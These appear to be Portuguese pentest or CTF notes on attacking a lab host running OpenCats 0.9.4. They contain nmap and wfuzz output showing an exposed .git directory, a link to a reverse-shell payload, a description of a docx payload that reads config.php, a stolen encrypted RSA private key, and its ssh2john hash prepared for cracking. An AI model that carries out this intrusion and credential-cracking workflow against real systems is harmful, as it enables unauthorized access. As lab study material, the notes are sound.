#### Portas
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 27:82:2f:11:32:ed:f2:16:80:6c:1f:58:70:db:23:02 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDje0H9Fac/ESO7mXKoLNV4omG15KKoEYGlHf7vx3Xj/C/0Ad2ZwZiGFECTqyrL9wCrocf7YzUHJ6hP1JV3g+HzNlATf6utCdnGBgOh60OescS24rpcn22Jka4hoWaLUr/gDWblUgS9s/s9zi0KLWpgewGAFGsN8V8O9M2PIcqXM39+zNb6Qaxu4UfGm+kCu3RcotMVx50LJG2d3XSaJnoBxWmjEmR236k+7YtYS1AnZUL67d4EMaKfG3ThSf4+auKNQCyNIvYAjCXMDABdZ3Np+EcnmzZnVSLSsAQgNGtePBHpx1V5WFSrwSgpqzyD/lVrgOJBtip7yEIGk9lgIwpx
| 256 bd:f8:6f:63:ca:92:c2:23:73:0e:43:bf:a7:f6:6d:c2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD27xCr3Ej3LxvwtFPQrgIloZuZ77XaFSwUBT0yxfoHLhdiogpVJ+oiQG15afzdjkPTddjy2oyIw4a2LW6cXIzE=
| 256 8a:f1:d9:33:fa:d1:74:4d:30:6a:36:8a:70:79:84:4c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILlkXtsTGTbiTf3XfxmY6Wwh5Yj57tJa4H1tq1woJjcJ
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: P\\xC3\\xA1gina Inicial
|_http-generator: Nicepage 3.25.5, nicepage.com
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#### Serviços
Apache httpd 2.4.29
OpenSSH 7.6p1
OpenCats 0.9.4 -> Payload <https://github.com/Nickguitar/RevCAT/blob/main/RevCAT.sh>
#### FUZZ
Target: <http://10.9.2.13/FUZZ>
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000025: 403 9 L 28 W 274 Ch ".htaccess"
000000024: 403 9 L 28 W 274 Ch ".hta"
000000026: 403 9 L 28 W 274 Ch ".htpasswd"
000000728: 301 9 L 28 W 307 Ch "assets"
000002165: 301 9 L 28 W 307 Ch "images"
000002192: 200 340 L 1845 W 34691 Ch "index.html"
000003710: 403 9 L 28 W 274 Ch "server-status"
Target: <http://10.9.2.13/opencats/FUZZ>
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000009: 301 9 L 28 W 314 Ch ".git"
000000012: 200 8 L 21 W 210 Ch ".git/config"
000000018: 200 8 L 9 W 106 Ch ".gitignore"
000000011: 200 1 L 1 W 41 Ch ".git/HEAD"
000000014: 200 16 L 60 W 965 Ch ".git/logs/"
000000026: 403 9 L 28 W 274 Ch ".htpasswd"
000000025: 403 9 L 28 W 274 Ch ".htaccess"
000000024: 403 9 L 28 W 274 Ch ".hta"
000000013: 200 3194 L 6837 W 142777 Ch ".git/index"
000000599: 301 9 L 28 W 314 Ch "ajax"
000000734: 301 9 L 28 W 321 Ch "attachments"
000000986: 301 9 L 28 W 317 Ch "careers"
000001094: 301 9 L 28 W 318 Ch "ckeditor"
000001374: 301 9 L 28 W 312 Ch "db"
000002165: 301 9 L 28 W 316 Ch "images"
000002193: 200 101 L 291 W 3671 Ch "index.php"
000002349: 301 9 L 28 W 312 Ch "js"
000002443: 301 9 L 28 W 313 Ch "lib"
000002719: 301 9 L 28 W 317 Ch "modules"
000003584: 301 9 L 28 W 313 Ch "rss"
000003650: 301 9 L 28 W 317 Ch "scripts"
000003916: 301 9 L 28 W 313 Ch "src"
000004092: 301 9 L 28 W 314 Ch "temp"
000004108: 301 9 L 28 W 314 Ch "test"
000004303: 301 9 L 28 W 316 Ch "upload"
000004380: 301 9 L 28 W 316 Ch "vendor"
000004604: 301 9 L 28 W 314 Ch "wsdl"
000004642: 301 9 L 28 W 313 Ch "xml"
Payload em docx. Se for preciso alterar a payload, só usar o comando unzip word2.docx e abrir o arquivo word/document.xml
word2.docx
chave rsa que conseguimos usando a payload. Na payload estamos lendo o arquivo config.php e codificando ele em base64
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,EFEEC109F12F7F7DCE3774683ECCB526
T8FEq1KkdgKxsP96coZo8HCqCHFZ8V3ik5Su+XjyUBp+TwxLxNgjSuAtFhYkRtHL
b6Ao/pdTIcZY1dBQB9Imh5+PKHwBuffNGihK2OL4EqpGaTU/BZWR7P/ZMR1JiLCa
GCN9wTMc44SZcpMSRvzNAWLiTnejFsd5kwaj/ekQHoBqgQzTheg/v9K49dTWeBtG
oKhb/pZFofJr0XJWGAhHk0a2oS1QjlLW0kro4LBvqp2eEzJZJHlukUClpiWaUpoE
t5M5Z4KRUuyXfGDGInMSg8ibWV/eM6Fng4iOdnnwbELKFQh8vLTO+hYLzrUOAVwE
vVClxXNBEk6tGoBvYULUugwwa0ezF7B8fMDefT88iG6xOUtslQmFCQECeBACvFuN
5TnJo8BT5BkHqiySb3vaRorE15QcHQUfAfSMTPgaQO23a8aKut/MzyBQmmm3+Wn0
hmN/oPvJ4c39jiTaHH8RCF6t6fcU3SnTylcOBUpS3CEVF0zddXRYJyIngH+pDs4L
6O5tSDl9LUCsnCzcc/J+jX0gHx69b18r+p9tietSqgZrwtwFJRhrtSGJcfDsH2vI
yTGgK/iEIPird4H85YP6MjLU77fsi9A6uUFH/UJ0MUZV8RbFx2X/VfxSVXhPWFZk
rU9zcvu7vVVux9FmEiGTVtGKIUlWAW75ewuL+zALTBh9yAgmNH1q5vc4ltzPL7JC
2D5mAxJ34wWfRaZ1p4mVqv+X4AacmmtlvMur2AFdvhblJ/tBGu+H5qL3tt4cxbzT
+42vXvL4oX8oKbM4dtc2X7FdVLXtg9VElh90NCPyjEuBw5ucQTnfSspv0ivcRhHD
9L1Kq0viL1VdOHbV6Pkn676xMedChHwwMSRmiRtqEYZ+G/q4kBCSXxtLUU/zNLtX
65tz3Mt9FpTh9uRDEKh8Gn/DoAe6pt+V53YRqhlDjSWspHRn+s3Yrvb0j1GZX1wh
+9H7fix3f08W05rypP95i0XP3WWssEoraRWd/RIqw2ngyGfj7jyG4cC974M9+D4t
0Mcx4jjuoeR41IiOJrVBqnmRQAVntasW5b+PJTYqDQH/42y74xWMoDxmKnL2yCVI
WE2nbf1C4EYoBbMkNKWh6soZKv3q0pvTx5D32WSzIuxio/eOVawoxGMB8AWvlvlZ
PgkaXxMpZzTGwgBV1GcLiqLZJcdV56ZX86OXyHlAT8pVyeRy7rEfOn/jZfO1O+qP
xhzKEotMkzdZbXmSEUwh/nScchcAqU+EKLFfqvhNxQwa1XEhayjAYpkdXsgzMywi
T+E6xU+FKYtxoGFY5N9W26CbKvMo1f/lvnycdd9gvaCugllLe1/D/uq2SPOQw5Dk
xiATkkCuGBe76Foh0trrIoJmlWgMy028siLuAfrHpyaNoEgXhvJ/1Xr9S2+9oB/Z
gH2fDWcaF25yNAI9XVN21wKh8OR/zNgIu8fPaI/5mZajZ32vNEbZpSiLujI5keo4
7iS34kyQ2kwAEF01vR+Rt/5i5XoTiDybmDuNMrqsF8uDoYlXhocqFxKq+hTxMzo/
22H+Ae/lduNPmeuX+AsOA1NeBFA+ep06hEo5BV5qcB9MAEQxgQk+PHW9Yu96nKvl
-----END RSA PRIVATE KEY-----
depois disso precisamos usar uma ferramenta do john the ripper para "converter" para um padrão onde o john consiga quebrar e encontrar a senha. Vamos utilizar o ssh2john.py. Depois de usado, ficará neste padrão
idrsa:$sshng$1$16$EFEEC109F12F7F7DCE3774683ECCB526$1200$4fc144ab52a47602b1b0ff7a728668f070aa087159f15de29394aef978f2501a7e4f0c4bc4d8234ae02d16162446d1cb6fa028fe975321c658d5d05007d226879f8f287c01b9f7cd1a284ad8e2f812aa4669353f059591ecffd9311d4988b09a18237dc1331ce3849972931246fccd0162e24e77a316c7799306a3fde9101e806a810cd385e83fbfd2b8f5d4d6781b46a0a85bfe9645a1f26bd172561808479346b6a12d508e52d6d24ae8e0b06faa9d9e13325924796e9140a5a6259a529a04b7933967829152ec977c60c622731283c89b595fde33a16783888e7679f06c42ca15087cbcb4cefa160bceb50e015c04bd50a5c57341124ead1a806f6142d4ba0c306b47b317b07c7cc0de7d3f3c886eb1394b6c950985090102781002bc5b8de539c9a3c053e41907aa2c926f7bda468ac4d7941c1d051f01f48c4cf81a40edb76bc68abadfcccf20509a69b7f969f486637fa0fbc9e1cdfd8e24da1c7f11085eade9f714dd29d3ca570e054a52dc2115174cdd757458272227807fa90ece0be8ee6d48397d2d40ac9c2cdc73f27e8d7d201f1ebd6f5f2bfa9f6d89eb52aa066bc2dc0525186bb5218971f0ec1f6bc8c931a02bf88420f8ab7781fce583fa3232d4efb7ec8bd03ab94147fd4274314655f116c5c765ff55fc5255784f585664ad4f7372fbbbbd556ec7d16612219356d18a214956016ef97b0b8bfb300b4c187dc80826347d6ae6f73896dccf2fb242d83e66031277e3059f45a675a78995aaff97e0069c9a6b65bccbabd8015dbe16e527fb411aef87e6a2f7b6de1cc5bcd3fb8daf5ef2f8a17f2829b33876d7365fb15d54b5ed83d544961f743423f28c4b81c39b9c4139df4aca6fd22bdc4611c3f4bd4aab4be22f555d3876d5e8f927ebbeb131e742847c30312466891b6a11867e1bfab89010925f1b4b514ff334bb57eb9b73dccb7d1694e1f6e44310a87c1a7fc3a007baa6df95e77611aa19438d25aca47467facdd8aef6f48f51995f5c21fbd1fb7e2c777f4f16d39af2a4ff798b45cfdd65acb04a2b69159dfd122ac369e0c867e3ee3c86e1c0bdef833df83e2dd0c731e238eea1e478d4888e26b541aa7991400567b5ab16e5bf8f25362a0d01ffe36cbbe3158ca03c662a72f6c82548584da76dfd42e0462805b32434a5a1eaca192afdead29bd3c790f7d964b322ec62a3f78e55ac28c46301f005af96f9593e091a5f13296734c6c20055d4670b8aa2d925c755e7a657f3a397c879404fca55c9e472eeb11f3a7fe365f3b53bea8fc61cca128b4c9337596d7992114c21fe749c721700a94f8428b15faaf84dc50c1ad571216b28c062991d5ec833332c224fe13ac54f85298b71a06158e4df56dba09b2af328d5ffe5be7c9c75df60bda0ae82594b7b5fc3feeab648f390c390e4c620139240ae1817bbe85a21d2daeb22826695680ccb4dbcb222ee01fac7a7268da0481786f27fd57afd4b6fbda01fd9807d9f0d671a176e7234023d5d5376d702a1f0e47fccd808bbc7cf688ff99996a3677daf3446d9a5288bba323991ea38ee24b7e24c90da4c00105d35bd1f91b7fe62e57a13883c9b983b8d32baac17cb83a1895786872a1712aafa14f1333a3fdb61fe01efe576e34f99eb97f80b0e03535e04503e7a9d3a844a39055e6a701f4c00443181093e3c75bd62ef7a9cabe5